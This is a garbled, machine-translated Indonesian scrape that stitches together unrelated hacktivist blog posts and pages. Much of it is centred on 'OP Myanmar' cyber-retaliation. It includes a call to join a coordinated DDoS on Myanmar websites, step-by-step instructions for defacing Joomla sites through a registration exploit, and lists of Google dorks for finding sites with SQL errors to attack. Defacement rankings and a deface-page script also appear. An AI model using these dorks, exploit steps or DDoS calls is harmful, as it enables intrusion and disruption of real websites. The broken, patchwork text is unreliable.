Apakah polisi cyber Indonesia. Apakah pemerintah Indonesia. Tidak. Hacker lah yang dengan gigih menjunjung tinggi derajat bangsa ini dengan melakukan gerakan OP Myanmar. Tanpa digaji pun hacker Indonesia akan bahu membahu membalas serangan yang dilakukan oleh Myanmar. Seperti yang kita ketahui, Myanmar sangat mudah melakukan aksi deface masal ke situs Indonesia karena mereka difasiliatsi untuk itu. Maksudnya. Ya, situs Indonesia sangat banyak. Jelas sangat mudah jika hanya mencari bug dan kemudian melakukan symlink. Di Indonesia ada google. co. id yang memudahkan mereka melakukan scan terhadap web target. Bandingkan dengan mereka. Situs Myanmar sedikit. Di sana tidak ada situs google !

Banyak situs Indonesia juga yang berhasil di down oleh hacker Myanmar. Salah satunya itu forum kebanggaan kita KAS KUS dan beberapa situs Pemerintahan Indonesia seperti www. indonesia. go. id www. tni. mil. id dan masih banyak lagi. Gimana Gan. Kesel g tuh gan ? Oleh karena itu, diputuskan malam ini DDoSer Indonesia akan melakukan balasan dengan meratakan situs-situs Myanmar secara bersama-sama. Ya, malam ini kami akan melakukan serangan DDoS secara serempak! Silahkan yang ingin ikut berpartisipasi, siapkan Tools DDoS andalan kalian dan kita bakar bersama-sama situs Myanmar. Semakin banyak yang ikut, semakin besar peluang kita untuk sukses !

Para hacker disini apakah masih berdiam diri melihat tingkah Myanmar. Apakah agan-agan geram. Maka dari itu kalo ada yang pengen ikut grup OP Myanmar bisa di klik disini

Satu Niat - Satu Semangat - Satu Komando

Quote: Mungkin menjadi pertanyaan bagi kebanyakan yang baru bergabung, jadi saya harap apabila ada pertanyaan serupa tinggal di copaskan saja jawaban2 saya ini.

Tanya : 1. Serangan apa yang dilakukan op myanmar kepada website myanmar makud saya apakah para member op myanmar membalas dengan hinaan sperti gambar2 pelecehan yg dilalukan myanmar kepada website indo?

Jawab : Kita bukan mereka [myanmar], kita menjunjung tinggi keberagaman, kita saling toleransi terhadap keyakinan yang berbeda, jadi kami tidak membalas seperti yang mereka [myanmar] lakukan. kita di sini real action, bila mereka [myanmar] mendeface site2 Indonesia yang kemudian di ganti halamannya dengan hinaan kepada Indonesia, maka kita membalas dengan attack untuk melemahkan infrastruktur jaringan internet mereka [myanmar], dan bukannya kita tidak bisa membalas dengan mendeface site2 myanmar, akan tetapi karena bahasa dan tulisan myanmar yang tidak di akui oleh dunia internasional [google] sehingga sangat menyulitkan, akan tetapi kami terus mempelajari site2 myanmar untuk dicari celahnya.

Tanya : 2. mengapa website presiden myanmar ikut diserang?

Jawab : Karena site tersebut adalah lambang supremasi negara, mereka [myanmar] pun juga berkali menyerang dan sempat berhasil mendownkan site resmi Indonesia. http://www. blinkhackergroup. org/2013. l-is-gone. html http://www. facebook. com/photo. php? fb. 1572407&type=3

Tanya. 3. mengapa hacker myanmar mengaku kalau hacker indolah yg duluan menyerang mereka dengan cara menDDOS situs budha dan presiden. ibaratnya orng gak bakal marah klo gk ada orng yg usil duluan ( bukan bertujuan menuduh saya hanya bertanya)

Jawab : Adalah hal yang wajar jika saat ini mereka berdalih demikian karena mereka bertujuan cuci tangan setelah melakukan aksi deface yang menghina bangsa Indonesia dengan merubah tampilan site dengan gambar "babi" dan diatasnya diberi tulisan "ALLAH" dalam tulisan arab. secara kasat mata kita bisa menilai bagaimana prilaku mereka [myanmar], dan kontra informasi untuk melemahkan musuh dengan berdalih ini itu juga mereka [myanmar] lakukan. sehingga paling tidak dapat mempengaruhi pemikiran2 putra putri Ibu Pertiwi yang tidak mengerti duduk masalah, terbukti dengan munculnya beberapa pertanyaan seperti ini. tujuan mereka [myanmar] sebenarnya terbaca jelas, supaya putra putri Ibu Pertiwi tidak banyak yang turut serta mendukung OP myanmar sehingga mereka [myanmar] dapat memenangkan cyberwar ini, tetapi mereka salah memprediksi, terbukti juga masih banyak putra putri Ibu Pertiwi yang ikhlas menjaga kehormatan Ibu Pertiwi.

Tanya. 4. mengapa di grup ini tutorial mendefece dan menDDOS situs myanmar di rahasiakan? padahal kita tau klo kita sangat membutuhkan orng untuk bersatu menyerang website myanmar jika dirahasiakan khususnya untuk yang masih newbie pasti gk tau caranya

Jawab : Silahkan baca aturan/rule group ini di keterangan group, sehingga anda bisa memahami. di sini adalah aksi attack, real action, apabila kita masih disibukkan dengan segala tutorial dan pertanyaan2 yang gak jalas, lantas kapan fokus untuk attack, target dan tools online untuk menyerang sudah disiapkan oleh team, sehingga aksi serangan bisa berjalan lancar dan target2 dapat di DOWN kan.

Tanya : 5. mengapa hacker myanmar hanya menyerang website indo? padahal negara islam asian bukan cuma indo contohnya malaysia, brunei dll. saya curiga apakah ada pihak ketiga yg mengakibatkan hacker myanmar hanya menyerang website indo padahal kita beranggapan klo indo tdk bersalah, apakah indo yg menyerang myanmar duluan?

Jawab : kembali ke jawaban nomer 3, silahkan dibaca lagi. dan tahun lalu pada saat OP myanmar I. mereka [myanmar] menyerang malaysia dan menekan malaysia dengan banyak mendeface site2 malaysia, mentake over banyak group dan FP malaysia tanpa balas, mereka [myanmar] rupanya memanfaatkan kelemahan mereka menjadi kekuatan, site2 myanmar yang jumlahnya sedikit kemudian tidak didukung oleh google sehingga cukup sulit untuk di deface dan menerapkan pola tekanan yang sama terhadap Indonesia dan mereka terkejut ketika putra putri Ibu Pertiwi bangkit untuk menjaga dan membela kehormatan Ibu Pertiwi.

** tambahan dari saya : myanmar telah memulai cyberwar ini dan kami tidak akan pernah mengakhiri perang ini sebelum mereka [myanmar] menghapus semua publikasi deface mereka [myanmar] terhadap site2 Indonesia di semua media online dan meminta maaf secara resmi kepada bangsa Indonesia di media2 online mereka [myanmar]. ucapan kami adalah janji kami, RATAKAN SEMUA KEPENTINGAN2 MYANMAR DI INTERNET INI.

Welcome My Blog

Fuji Furukawa E&C (Myanmar) Co. Ltd. was established in October, 2012. Our main business activities are engineering and installation work of electrical, mechanical and air conditioning facilities. The circumstances surrounding Myanmar are grammatically changing since the democratization and economic reform are forcefully advancing. We are going to continue working to achieve high expectations in Myanmar such as plant expansion and ODA project from Japan with the rapid democratization and economic reform.

Yangon (Head Office)

No.79, Lanmadaw Street, CMA Tower Room (702)

7 Ward, Lanmadaw Township, Yangon, Myanmar

Welcome to our Home Page

Opening Ceremony of FFEC-MM at Sedona Hotel Yangon on October 09, 2012

Memory of Meiji University visiting our company

Before starting the project

FFEC-MM Electrical Engineer

Opening Ceremony on September 24, 2013

Dalam pelajaran ini, Anda akan mendapatkan sedikit pengetahuan lebih teoritis tentang HTML.

Apa lagi yang tahu tentang HTML?

HTML dapat dikodekan dalam berbagai cara. Dan browser dapat membaca HTML dengan cara seperti banyak. Anda bisa mengatakan bahwa HTML memiliki banyak dialek. Itulah mengapa beberapa website terlihat berbeda di browser yang berbeda. Ada upaya untuk membuat satu standar umum HTML melalui World Wide Web Consortium (W3C) didirikan oleh Tim Berners-Lee (yep! orang besar yang menemukan HTML). Tapi itu telah menjadi jalan panjang dan sulit. Di masa lalu - ketika browser di mana sesuatu yang Anda harus membayar untuk - Netscape adalah mendominasi browser. Waktu itu, standar HTML paling didukung di mana disebut 2.0 dan kemudian 3,2. Tapi dengan pangsa pasar lebih dari 90% Netscape tidak perlu - dan tidak - peduli tentang standar umum. Sebaliknya, Netscape diciptakan unsur mereka sendiri yang aneh, yang tidak berfungsi di browser lainnya. Selama bertahun-tahun Microsoft hampir sepenuhnya diabaikan Internet. Setelah beberapa saat mereka mengambil persaingan dengan Netscape dan memperkenalkan browser. Versi pertama dari browser Microsoft, Internet Explorer, tidak lebih baik dari Netscape untuk mendukung standar HTML. Tapi Microsoft memilih untuk memberikan browser mereka secara gratis (selalu hal yang populer untuk dilakukan) dan Internet Explorer segera menjadi browser yang paling populer. Dari versi 4 dan 5 Microsoft yang ditujukan untuk mendukung lebih dan lebih dari standar HTML dari W3C. Netscape tidak berhasil mengembangkan versi baru dari browser mereka dan terus mendistribusikan versi kuno 4. Sisanya adalah sejarah. Hari ini standar HTML disebut 4.01 dan XHTML. Sekarang Internet Explorer yang memiliki pangsa pasar lebih dari 90%. Internet Explorer masih memiliki unsur sendiri aneh tapi juga mendukung HTML standar W3C. Demikian juga semua browser lainnya, seperti Mozilla, Opera dan Netscape. Jadi, ketika Anda kode HTML mengikuti standar W3C, Anda membuat website yang dapat dilihat di semua browser - baik sekarang dan di masa depan. Dan untungnya, apa yang Anda pelajari dalam tutorial ini adalah versi baru dan lebih ketat dan bersih dari HTML disebut XHTML.

Bagaimana cara memberitahu versi yang digunakan?

Dengan semua jenis HTML Anda perlu memberitahu browser yang "dialek" HTML Anda berada, dalam XHTML kasus Anda. Untuk melakukan itu, Anda menggunakan Deklarasi Tipe Dokumen. Deklarasi Tipe Dokumen selalu ditulis di atas dokumen: Contoh 1:

Selain Deklarasi Tipe Dokumen (baris pertama dalam contoh di atas), yang memberitahu browser bahwa Anda ingin menulis XHTML, Anda juga harus memasukkan beberapa informasi tambahan pada tag html dengan dua atribut xmlns dan lang. xmlns adalah singkatan "XML-Space Nama-" dan harus selalu memiliki http://www. w3.org/1999/xhtml nilai. Itu semua yang perlu Anda ketahui. Tapi jika Anda memiliki rasa lapar besar untuk pengetahuan rumit Anda dapat membaca lebih lanjut tentang ruang nama di situs W3C. Dalam lang atribut Anda negara mana bahasa dokumen tertulis masuk Untuk ini standar ISO 639 digunakan, yang berisi daftar kode untuk semua bahasa di dunia. Dalam contoh di atas bahasa diatur ke Bahasa Inggris ("en"). Dengan DTD browser tahu persis bagaimana harus membaca dan menampilkan HTML Anda. Oleh karena itu, gunakan contoh di atas sebagai template untuk semua dokumen HTML masa depan Anda. DTD juga penting ketika Anda ingin memvalidasi halaman Anda.

Validasi? Mengapa dan bagaimana saya harus melakukannya?

Masukkan DTD di halaman Anda dan Anda selalu dapat memeriksa HTML Anda untuk kesalahan dengan menggunakan W3C validator gratis. Untuk menguji ini, membuat halaman dan meng-upload ke Internet. Sekarang, pergi ke validator. w3.org dan ketik alamat (URL) dari halaman Anda dan memvalidasi itu. Jika HTML Anda sudah benar anda akan mendapatkan pesan selamat. Jika tidak, Anda akan mendapatkan laporan kesalahan memberitahu anda apa dan di mana Anda telah melakukan sesuatu yang salah. Membuat beberapa kesalahan pada tujuan untuk melihat apa yang terjadi. Validator tidak hanya membantu untuk menemukan kesalahan. Beberapa browser mencoba untuk mengkompensasi kurangnya kemampuan di antara para pengembang web dengan mencoba untuk memperbaiki kesalahan dalam HTML dan menampilkan halaman karena mereka kira itu akan terlihat. Dengan browser tersebut, Anda mungkin tidak pernah melihat kesalahan dalam browser Anda sendiri. Namun, browser lain bisa menebak berbeda atau tidak menampilkan halaman sama sekali. Validator dapat membantu Anda menemukan kesalahan Anda bahkan tidak tahu ada. Selalu memvalidasi halaman Anda untuk memastikan bahwa mereka selalu akan ditampilkan dengan benar.

Mr. M. A.D

Situs-situs Strategis Myanmar Luluh Lantah oleh Hacker Indonesia

02 Maret 2013 18:46:13 Diperbarui. 24 Juni 2015 17:25:59 Dibaca: Komentar: Nilai:

Sukses dengan melumpuhkan beberapa situs strategis Myanmar seperti Situs - situs Bank dan situs pemerintahan Myanmar. para Hacker Indonesia masih belum puas dengan hasil tersebut terbukti dari semakin banyaknya situs strategis yang berhasil mereka lumpuhkan. Bahkan U Zaw Htay selaku direktur kantor President U Thein Sein langsung menulis di halaman facebooknya "Website President telah luluh oleh serangan hacker Indonesia begitupun Website Eleven Media dan Voice weekly juga dihack, sumber serangan dari Indonesia. (Myanmarupdate )

Malam ini situs pertahanan server Myanmar yang merupakan Situs Full service Provider mereka yakni Myanmar Teknologi Gateway beerhasil mereka luluh lantahkan sehingga database MTG error dan tak dapat diakses.

Berikut beberapa situs strategis Myanmar yang berhasil para Hacker Indonesia luluh lantahkan:

Siapa Yang Menilai Tulisan Ini ?

[Berita Hacking] Dunia Direktur Jenderal Kementerian Pertahanan On-Hack - MRR Cyber ​​ Pengunjung Setia Hello. Sekarang Ada Berita Hacking sini. Membaca langsung Aja.

Jakarta - Kementerian Pertahanan (Departemen Pertahanan) terkait memperjelas hacking yang terjadi di situs www. pothan. kemhan. go. id dimiliki Ditjen Potensi Pertahanan (Pothan). Kementerian Pertahanan mengatakan situs itu tidak dipotong tapi dibajak.

" terlihat itu belum hack tapi dibajak, "kata Kepala Komunikasi Kementerian Pertahanan, Brigadir Jenderal Sisriadi pesan teks ke AFP, Sabtu (2013/11/05).

Sisriadi tidak bisa mengatakan banyak berhubungan dengan dunia maya situs pertahanan kejahatan yang melanda Pemerintah Indonesia.

Sebelumnya diberitakan, situs resmi Departemen Pertahanan - dimiliki Ditjen Pothan, hack oleh hacker yang belum teridentifikasi. Situs berlamat Www. pothan. kemhan. go. id hack dan zoom tidak seperti itu harus diganti.

situs berubah latar belakang hitam dan penuh dengan kata 'Oops Myanmar Hacker Was Here'. Artikel menyindir pertahanan sebagai situs milik pemerintah.

Di bagian bawah kertas istilah bahasa Inggris yang berbunyi:

" Hello Pemerintah Indonesia, Anda harus bangga dengan berpendidikan skrip Indo kiddies. coz mereka percaya (defacing / ddosing) ke situs-situs negara lain adalah solusi terbaik bagi mereka. Jika Anda akan bersimpati programer putih / pengembang negara Anda dan bagaimana perasaan mereka. Anda dapat menangkap script kiddies tersebut. coz CVT adalah siap untuk memberikan mereka skiddies Informasi, "hacker menulis situs www. pothan. kemhan. go. id

Karena pemerintah menantang, para hacker juga meninggalkan alamat Facebook. Mereka menulis alamat Facebook-nya yang berbunyi 'Vampire Cyber ​​Team (http://facebook. com/cvtteam)'.

Tapi Situs http://www. pothan. kemhan. go. id/home Ini Kembali dipulihkan.

MRR Cyber ​​. Halo Teman, Ga ' ve Posting Lama. Liburan Soalnyaa lagi hehehe ^ _ ^. Sekarang Pagi ini. Saya Akan Berbagi Trik dan Tips Itu Cara Membuat Signal Booster Antena Modem Kan Sering Tuh. Jika Pagi Sinyal Bawah. Coba Pake Kemungkinan Tips Trik Bermanfaat ^ _ ^

Jika Anda berada di daerah, termasuk kemungkinan kurangnya jangkauan sinyal bisa mencoba tips berikut, di sini saya akan memberikan tutorial Cara Membuat Modem Signal Booster dengan memanfaatkan barang bekas seperti kaleng minuman. Siapa yang akan berpikir bahwa seperti kaleng minuman digunakan di atas yang biasanya menjadi limbah dapat menjadi alat yang berguna? tangan orang-orang kreatif semua itu bisa terjadi, Lakukan hal berikut: 1.Siapkan Bahan-Kain seperti kaleng, cutter, gunting dan busa dua sisi. 2.Cuci membersihkan kaleng minuman dan lap bawah 3.Potong semua kaleng seperti berikut: 4.Potong juga kaleng atas tetapi meninggalkan beberapa sentimeter 5.potong kaleng tengah dengan gunting 6. Berikan double tape di bagian atas kaleng dengan modem untuk menepelkan Dan hasilnya adalah sesuatu seperti ini Cara Membuat Modem Signal Booster Saya sudah mencoba di atas dan hasilnya cukup menambah kekuatan sinyal internet di rumah saya dari mudah untuk membuat terlalu rendah di atas sinyal timah. .

Thursday, August 15, 2013

Ada banyak klasifikasi program komputer yang tidak diinginkan dan berpotensi berbahaya yang dapat mempengaruhi komputer kinerja. klasifikasi adalah yang paling sering ditemui virus komputer, worm, dan trojan. Perbedaan worm komputer didefinisikan sebagai program jahat yang menyebar dan tersembunyi dan mereplikasi dirinya sendiri tanpa perlu campur tangan manusia. Worm beroperasi secara otomatis dan di luar sepengetahuan pengguna. Cacing mencoba untuk menyebar ke sistem komputer lain melalui jaringan atau cara lain. efek kuat efek worm komputer bervariasi dari ringan sampai menyebabkan gangguan pada tahap yang bisa merusakSetelah berhasil terinfeksi, komputer dan kemudian digunakan sebagai platform untuk menginfeksi komputer lain yang bersentuhan dengan komputer yang terinfeksi sebelumnya. Perilaku worm komputer menginfeksi sistem komputer dan segera mencoba untuk menyebarkan dirinya. Worm umumnya menggunakan koneksi jaringan internet pada komputer untuk menemukan komputer lain dan menginfeksi komputer. perlindungan yang kuat dari Worm worm komputer dapat dikontrol dengan menggunakan program anti-virus dan / atau anti-worm. worm akan menginfeksi komputer yang dapat terinfeksi, tetapi perlindungan yang tepat dapat menjinakkan keganasan cacing. Peringatan worm komputer memiliki aktivitas berbahaya potensial seperti mencuri data (spyware) atau kerusakan file ketika komputer telah terinfeksi. []

Ranking Penyerang [18 Mei 2013] - MRR Cyber Hello sobat MRR Malming Cyber ​​. Right Now Disini. Baca Abis Malming Dulu Deh. Siapa Tau Cyber ​​Team dalam Ordo kanan Anda. D: D. judul yang tepat Yaps. ane mo tau memberikan urutan peringkat: D. capcus yuk.

2. 3xp1r3 Cyber ​​Army Dari: Bangladesh Official Group: Klik Disini! Home Deface: 4357 Deface khusus: 308 Jumlah Deface: 9489 Unik Deface: 5012 3. Tim Keamanan Iran Dari: Iran Official Group: Klik Disini! Dan di sini! Home Deface: 104 Deface Khusus: 63 Deface Total: 5690 Uniqye Deface: 4656 4. The Crows Kru Dari: Indonesia Official Group: Klik Disini Dan Disini! Home Deface: 6842 Deface khusus: 417 Jumlah Deface: 11576 Unik Deface: 2945 b 5. Johor Hacking Kru Dari: Malaysia Official Group: Klik Disini Dan Disini! Home deface: 1483 Deface khusus: 142 Deface Total: 6591 Unik Deface: 2565 Beberapa Of My. Untuk Belajar Anda Bisa Buka Situs HACK-DB. Dengan mengklik link ini Jangan Lupa Untuk Buka Blog Anda MRR Yaitu Cyber ​​™ Akan Selalu Up To Date Jika Tidak Ada kendala. Ini Hanya atas My Post. Juga Jangan Lupa Baca Postingan Kami Lainnya dengan mengklik link INI Salam

Tuesday, August 13, 2013

Buat Sandi Dalam Folder Pada PC - Oke Sekarang Itu Kami Akan Memberikan Trick Membuat Password Pada Folder Pada PC Langsung Ga Usah Banyak Basa Basi Basi Dalam Dari Mending Baca: P Maaf Jika tidak terhubung hehehe

style = "line-height: 18.200000762939453px;"

Cara membuat password pada folder di komputer PC / Laptop kita dengan sangat mudah. Untuk melakukannya kita hanya perlu sebuah aplikasi gratis bernama Lock-A-Folder. Aplikasi ini sangat ringan dan memiliki kemampuan untuk melindungi folder kita.

gaya href = "http://www. blogger. com/blogger. g?blogID=7402172516224933982" name = "lebih"> Cara kerja aplikasi ini adalah folder yang Anda pilih akan menyembunyikan dan tidak terlihat bahkan jika kita melakukan pengaturan Tampilkan semua file dan folder. Hal ini akan meningkatkan keamanan folder. Namun, jumlah slot yang tersedia hanya 3, jadi kita hanya bisa melindungi 3 folder saja. style="line-height: 18.200000762939453px;" gaya sangat mudah cara untuk menginstalnya. Setelah menjalankan aplikasi ini, akan muncul menu dan kita akan diminta untuk memberikan password master. Setelah kita memberi password master, klik pada Lock Folder. Setelah itu kita pilih hanya folder di mana kita ingin mengunci. Kami cukup terbuka untuk menjalankan aplikasi tersebut, kemudian masukkan password master. Setelah itu kita klik Aktifkan kami Folder dan pilih folder Anda ingin membuka perlindungannya. style="line-height: 18.200000762939453px;" gaya Aplikasi Download Mengunci Folder di sini

Deface Dengan Joomla Eploit | - Hello. Maap Wkwkw 1 Bulan Pembaruan Neee Kaga. Seperti Kita Akan Sebaliknya Mengshare 5 Tulisan Tentang Hacker: P: P

Ada record Juga Disini Buat Posting Yang Satu ini. " Tidak Semua Itu Anda Ingin Deface Website Dapat Dengan Teknik ini. Kami Berharap Selalu Mencoba dan Mencoba. Karena Jika Tidak Diuji Tidak Akan. & Dunia Hacking Tidak Bisa Dicapai Dengan Instan Way [Tidak Mie Instan] dan Berhasil Dengan Mudah. Mereka Apakah Orang Sukses Selalu Berusaha Sabar dan Jauhkan Mencoba " Bahan Bahan: Eksploitasi Joomla. html

1. Target di Google. com Web Search dengan memasukkan Dork berikut:

intext: Joomla! adalah platform yang fleksibel dan kuat, Apakah Anda sedang membangun sebuah situs kecil untuk diri sendiri atau situs besar dengan Ratusan Ribuan pengunjung situs: com

# Dork Kembangin sendiri: p

2. Pilih target sobat, kemudian masukkan mengeksploitasi berikut:

index. php? option = com_users & pandangan = pendaftaran

3. Ane di sini mengambil contoh:

4 maka ane perubahan.

class="separator" style="clear: both; text-align: center;"> perbatasan

style = "color: # 999999; line-height: 18.1875px;">

; Font-family: Arial, Helvetica, sans-serif; line-height. 18.1875px; ">

5. Kemudian klik kanan> klik View Page Source atau juga dapat menekan CTRL + U

jika muncul sumber halaman, kemudian tekan CTRL + F atau klik Cari jenis menu tersembunyi. tampak seperti kode berikut: gaya

class="separator" style="clear: both; text-align: center;">

style="line-height: 18.1875px; text-align: justify;">

style = "line-height: 18.1875px; text - align: justify; ">

gaya =" line - height: 18.1875px; text-align: justify; ">

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style="line-height: 18.1875px; text-align: justify;"> gaya

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gaya =" line-height: 18.1875px; text-align: justify; ">

style = "line-height: 18.1875px; text-align: justify;"> 6. Copy kode tersebut, kemudian buka Exploit teman Joomla. html yang sudah download tadi dengan Notepad, kemudian paste kode tersebut, dan juga masukkan situs target dan teman email! Angka tanah liat!

style="line-height: 18.1875px; text-align: justify;">

class="separator" style="clear: both; line-height: 18.1875px; text-align: center;">

class = "separator" style = "clear: both; line-height: 18.1875px; text-align: center; ">

gaya =" line-height: 18.1875px; text-align: justify; ">

7. Kemudian Simpan! Kemudian buka file Exploit Joomla. html nya, klik Daftar!

style="line-height: 18.1875px; text-align: justify;">

kelas =" pemisah "style =" clear: both; line-height: teks 18.1875px; - align: center; ">

style = "line-height: 18.1875px;">

Cara Mudah Membuat Script HTML Untuk Deface - MRR Cyber ​​Malem Malem Gini Kemudahan Posting & Read This Post Singles Make. Wkwkwk. Oh Yeah Sekarang Aku Ingin jelasin HTML Script membaut Cara Deface. Dan Jangan Lupa Baca Lain Posts sini XD

Kelangkaan Langkah Cukup Mudah. Tapi Anda Harus Memiliki Software Notepad + + preemptively. Klik Disini Untuk men-download Aja Jika Anda Sudah Memiliki Yowes Langsung Baca

Cara untuk melakukan hal ini. 1. Buka Notepad + + 2. Script Copy Kode Berikut.

# Hacked By MR .2 nD Sederhana Script Oleh MRR Deface Cyber ​​ class = "WhiteGlow"> ; Tips: Surat Above It Dan Dapatkah Anda Edit seperti yang anda inginkan Heart You 3 kemudian Save & Store mana saja, Berkas Nama hingga Anda, Save As Type Pilih HTML. 4 Klik 2x html yang anda simpan tadi 5 Hasil Seperti Ini

Beberapa Of My Menjelaskan Tentang Cara Membuat Script Deface. gaya Untuk yang Ingin Membuat Sebuah Script Deface Dengan Lagu Bisa Klik link di sini

Membuat Kalkulator Dengan Notepad MRR Cyber ​​ - Sekarang MRR Cyber ​​ Ingin Akan Trik Love Here. Trik " Cara Membuat Kalkulator Sederhana Dengan Notepad " Kan Pernah Pertama Bagi Ane Juga Tuh Cara Membuat Gunakan Notepad DDoS Alat Berikut Contoh Gambar Kalkulator buatan saya hehehe.

Meskipun Jarang Digunakan Tapi Ya Lah Fair & Trik Untuk Mencari Ilmu Lebih Banyak Lagi. Ga Ada Kata Terlambat Untuk Belajar. Mari kita Langsung Ke Caranya Aja ^ _ ^

TUTORIAL . [1]. Buka Notepad, Kalkulator Script Kemudian copypaste bawah.

class="separator" style="clear: both; text-align: left;"> [2]. Kemudian, Simpan ekstensi. Bat

class="separator" style="clear: both; text-align: left;"> contoh Cyber ​​MRR Kalkulator - MRR Cyber kelelawar.

class="separator" style="clear: both; text-align: center;">

[3]. Kalkulator untuk pemula. Buka file. Bat Itu tergantung di mana Anda menyimpan file ^ _ ^

class="separator" style="clear: both; text-align: center;">

class="separator" style="clear: both; text-align: left;">

class="separator" style="clear: both; text-align: left;"> Simplekan? Buatlah mudah? Aja langsung dicobain HaHaHa.

class="separator" style="clear: both; text-align: left;"> Berbagi hehehe. Senang

set Dork Untuk Deface Situs Web - Nah Nah. Disini Kita Bertemu Lagi Wkwkwk: P Sekarang aku Akan Berbagi Dork Untuk Deface Situs Langsung Aja Baca Baca Ye. P: P

intext: "kesalahan dalam SQL sintaks "+ site: saya intext:" mysql_num_rows () "+ site: il intext:" mysql_fetch_array () "+ site: br intext:" Kesalahan Terjadi Saat Pengolahan Permintaan "+ site: il intext: "Server Error in '/' Application" + site: saya intext: "Microsoft OLE DB Provider untuk ODBC Drivers error" + site: br intext: "Invalid querystring "+ site: saya intext:" Provider OLE DB untuk ODBC "+ site: saya intext:" Kesalahan VBScript "+ site: saya intext:" ADODB. Field "+ situs. saya intext: "BOF atau EOF" + site: intext saya: "ADODB. Command" + site: intext saya: "JET Database" + site: saya intext: "mysql_fetch_row ()" + site: intext saya: "Sintaks error" + site: intext saya: "include ()" + site: saya intext: "mysql_fetch_assoc ()" + site: intext saya: "mysql_fetch_object ()" + site: my intext: "mysql_numrows ()" + site: il intext: "GetArray ()" + site: intext saya: "fetchRow ()" + site: saya intext: "Input String tidak dalam Format "+ situs yang benar:

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Melindungi komputer anda dari serangan virus semakin sulit setiap harinya. Tidak saja pihak produsen software antivirus yang terus inovatif memerangi virus, pihak pengembang virus juga tidak mau kalah selalu menaikkan kecerdasan virus buatannya melumpuhkan sasaran. Bahkan perusahaan raksasa sekelas Microsoft dengan tingkat pengamanannya pernah terganggu dengan ulah virus kecil yang menyusup di tahun 2000-an.

Mungkin anda masih ingat ketika “masa lalu” sebelum muncul internet dan program aplikasi lainnya yang bisa diunduh. Hampir dipastikan penyebaran virus sangat lambat sekali hanya beralih dari disket satu ke disket yang lainnya, tentu saja pergerakan virus sangat terbatas ruang kerjanya, lebih mudah dibasmi dan tidak seganas sekarang. Antivirus saat itu memang terbilang sangat canggih untuk membasmi virus dijamannya. Terlebih lagi seorang pengguna lebih dahulu melalukan proses scanning sebelum membaca/ menulis data yang ada di disket, sehingga penyebaran virus tentu jauh lebih mudah dibersihkan. Semenjak kemunculan internet turut “membantu” penyebaran virus seantero dunia dengan sangat cepat dan mudah. Virus dengan leluasa berpindah - pindah dari server satu ke server yang lainnya dan kemudian berpindah ke komputer user. Tergantung tingkat pengamanan komputernya tentu saja jika sekuritasnya tinggi tentu tidak jadi soal, jika lemah pengamanannya akan jadi santapan lezat virus. Tampaknya kekhawatiran semakin menjadi setalah email juga bisa menyusup melalui email, lampiran email, jaringan peer to peer, instan messanger, dan download program dari internet. Rupanya sebuah virus kini semakin cerdas penyebarannya bisa dipastikan sudah tidak memerlukan campur tangan manusia lagi. Virus pintar dapat menyerang beberapa entry point pada kelemahan sistem. Dengan kemajuan teknologi sehari-hari, dan konvergensi dari komputer dengan perangkat mobile lainnya, potensi ancaman jenis baru juga meningkat. Melindungi Komputer Anda Untungnya, kemajuan perangkat lunak antivirus terus memacu “dapurnya” untuk menekan perkembangan virus, worm, dan Trojan saat ini. Program lunak antivirus adalah penting untuk kemampuan komputer untuk menangkis virus dan program berbahaya lainnya. Produk-produk ini dirancang untuk melindungi terhadap kemampuan virus untuk memasuki komputer melalui email, web browser, file server dan desktop. Selain itu, program ini menawarkan fitur kontrol terpusat yang menangani penyebaran, konfigurasi dan selalu update. Jika komputer ingin selalu sehat dan bersih dari virus, seorang user harus rajin dan mengikuti beberapa langkah sederhana untuk melindungi terhadap ancaman virus, seperti berikut ini

1. Evaluasi sistem keamanan komputer Seperti yang pernah saya tulis di artikel sebelumnya virus selalu tumbuh kembang sesuai dengan jamannya. Jika sistem komputer masih lama dan belum update dengan yang terbaru, virus akan semakin mudah menjangkiti sistem komputer anda. Keamanan semakin baik dengan sistem berlapis tentu lebih baik melindungi semua aspek dari sistem komputer. Pilihlah fitur keamanan yang mencakup beberapa fitur antivirus, firewall, filter konter, dan deteksi virus. Pengamanan komputer yang kuat tentu saja akan membuat susah virus menembus proteksi sistem komputer anda. 2. Install Software hanya dari developer terkemuka Sudah jelas pengembang program yang terkenal tidak mungkin mengeluarkan program yang dibuat dengan tambahan program jahat atau disusupi virus. Hanya dengan memilih program terbaru dari pembuat program terpercaya ini merupakan langkah untuk melindungi sistem anda. 3. Biasakan selalu scanning flasdisk atau memory card Kebiasaan ini sangat baik untuk mengurangi tingkat penyebearan virus yang sangat cepat. Antivirus yang bagus bisa dengan mudah mendeteksi virus yang mengganggu. 4. Hati - hati ketika membuka dokumen asing, (word, excel, pdf, atau lainnya) terutama jika di terima secara online melalui email. Lakukan proses scanning secara benar menggunakan antivirus. 5. Back up secara teratur file data penting, di komputer menggunakan CD/ DVD jangan simpa di dalam harddisk komputer.

Antivirus Rekomendasi Terbaik Di pasaran tersedia berbagai aplikasi antivirus. Sedikit hal yang perlu anda ketahui bahwa mungkin beberapa program ini susah untuk di-uninstall, sebagai solusinya pastikan untuk membuat sistem restore poin sebelum menginstalnya. Namun, tidak perlu khawatir program - program antivirus ini memang patut anda coba. Beberapa program ini efektif, mudah, dan tentu saja sangat ampuh menumpas virus, spyware, malware, Trojan, worm, dan yang lainnya. Berikut program antivirus yang direkomendasikan oleh Microsoft untuk windows 7: 1. Microsoft Security Essentials Unggul dalam bidangnya membuat Microsoft tampil terdepan untuk sebuah antivirus yang tersemat di operasi sistem Windows 7 besutannya. Melindungi PC sepanjang waktu dari serangan virus, spyware, dan program merugikan lainnya. Microsoft security essentials ini tentu saja gratis anda gunakan. Kabarnya antivirus dari Microsoft muncul kekhawatiran dari antivirus lainnya sebab keunggulan yang ditawarkan sudah menyamai versi Premium dan sangat mudah digunakan.

Klik disini download MES 2. Avast Free Antivirus Avast antivirus ini tersedia dalam 2 versi gratisan dan berbayar. Hadir sangat lengkap melindungi komputer dari serangan virus dan sebangsanya. Mesin satu ini dilengkapi pula senjata melawan spyware, firewall, mengidentifikasi website yang terkandung virus, dan antispam sebagai perlindungan ganda komputer anda. Sangat muda digunakan dan aman untuk semua sistem komputer.

